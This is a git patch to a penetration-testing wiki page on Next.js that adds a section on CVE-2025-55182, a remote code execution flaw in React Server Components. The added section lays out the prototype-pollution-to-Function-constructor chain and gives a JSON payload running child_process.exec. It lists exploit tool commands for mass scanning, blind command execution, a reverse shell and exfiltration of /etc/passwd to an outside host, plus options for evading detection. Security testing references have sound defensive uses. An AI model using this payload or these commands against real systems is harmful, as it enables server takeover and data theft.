From 2a6ae2df1d191894ee269c9aca9a4a49d2e0b228 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Fri, 5 Dec 2025 12:48:44 +0000 Subject: [PATCH] Add content from: CVE-2025-55182 React Server Components Remote Code Execution... --- .../pentesting-web/nextjs.md | 52 +++++++++++++++++-- 1 file changed, 48 insertions(+), 4 deletions(-) diff --git a/src/network-services-pentesting/pentesting-web/nextjs.md b/src/network-services-pentesting/pentesting-web/nextjs.md index d55b9806754..3cf76707444 100644 --- a/src/network-services-pentesting/pentesting-web/nextjs.md +++ b/src/network-services-pentesting/pentesting-web/nextjs.md @@ -268,7 +268,7 @@ Catch-all routes handle multiple nested segments or unknown paths, providing fle ```arduino my-nextjs-app/ ├── app/ -│ ├── [..slug]/ +│ ├── [...slug]/ │ │ └── page.tsx │ ├── layout.tsx │ └── page.tsx @@ -1285,10 +1285,10 @@ Search downloaded JS chunks for `createServerReference` and extract the hash and ```regex # Strict pattern for standard minification -createServerReference\)\"([a-f0-9]{40,})\",\w+\.callServer,void 0,\w+\.findSourceMapURL,\"([^\"]+)\"\) +createServerReference\)"([a-f0-9]{40,})",\w+\.callServer,void 0,\w+\.findSourceMapURL,"([^"]+)"\) # Flexible pattern handling various minification styles -createServerReference[^\"]*\"([a-f0-9]{40,})\"[^\"]*\"([^\"]+)\"\s*\) +createServerReference[^\"]*"([a-f0-9]{40,})"[^\"]*"([^"]+)"\s*\) ``` - Group 1: server action hash (40+ hex chars) @@ -1332,9 +1332,53 @@ Replay in Repeater and test authorization, input validation and business logic o - Requires `productionBrowserSourceMaps` enabled in production to recover names from bundles/source maps. - Function-name disclosure is not a vulnerability by itself; use it to guide discovery and test each action’s authorization. +### React Server Components Flight protocol deserialization RCE (CVE-2025-55182) + +Next.js App Router deployments that expose Server Actions on `react-server-dom-webpack` **19.0.0–19.2.0 (Next.js 15.x/16.x)** contain a critical server-side prototype pollution during **Flight** chunk deserialization. By crafting `$` references inside a Flight payload an attacker can pivot from polluted prototypes to arbitrary JavaScript execution and then to OS command execution inside the Node.js process. + +{{#ref}} +../../pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md +{{#endref}} + +#### Attack chain in Flight chunks + +1. **Prototype pollution primitive:** Set `"then": "$1:__proto__:then"` so that the resolver writes a `then` function on `Object.prototype`. Any plain object processed afterwards becomes a thenable, letting the attacker influence async control flow inside RSC internals. +2. **Rebinding to the global `Function` constructor:** Point `_response._formData.get` at `"$1:constructor:constructor"`. During resolution, `object.constructor` → `Object`, and `Object.constructor` → `Function`, so future calls to `_formData.get()` actually execute `Function(...)`. +3. **Code execution via `_prefix`:** Place JavaScript source in `_response._prefix`. When the polluted `_formData.get` is invoked, the framework evaluates `Function(_prefix)(...)`, so the injected JS can run `require('child_process').exec()` or any other Node primitive. + +#### Payload skeleton + +```json +{ + "then": "$1:__proto__:then", + "status": "resolved_model", + "reason": -1, + "value": "{\"then\":\"$B1337\"}", + "_response": { + "_prefix": "require('child_process').exec('id')", + "_chunks": "$Q2", + "_formData": { "get": "$1:constructor:constructor" } + } +} +``` + +The Python proof-of-concept converts this JSON into a full Flight payload and posts it to the Server Action endpoint. Once arbitrary JS runs, attackers can drop to the OS, stage web shells, or pivot laterally using the Node process credentials. + +#### Operational tooling + +- **Single target check / exploitation:** + - `python3 exploit.py http://target:3000 --check` sends non-destructive payloads to confirm the vulnerable resolver behavior. + - `python3 exploit.py http://target:3000 -c "id"` executes blind shell commands through the Function gadget. +- **Batch scanning:** `python3 exploit.py -f targets.txt --check --stealth crawler --delay 2 -o vulnerable.txt` iterates through a newline-separated target list (lines starting with `#` are ignored) and records confirmed hits. +- **Post-exploitation primitives:** + - Reverse shell: `python3 exploit.py http://target:3000 --revshell 10.0.0.1 4444` (pair with `nc -lvnp 4444`). + - Data exfiltration over raw sockets: `python3 exploit.py http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444`. +- **OPSEC features:** `--proxy socks5://127.0.0.1:1080`, `--stealth {browser,crawler,security}`, `--delay ` and `--variants` randomize headers / payload encodings to evade noisy detections. + ## References - [Pentesting Next.js Server Actions — A Burp Extension for Hash-to-Function Mapping](https://www.adversis.io/blogs/pentesting-next-js-server-actions) - [NextjsServerActionAnalyzer (Burp extension)](https://github.com/Adversis/NextjsServerActionAnalyzer) +- [CVE-2025-55182 React Server Components Remote Code Execution Exploit Tool](https://github.com/Spritualkb/CVE-2025-55182-exp) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}}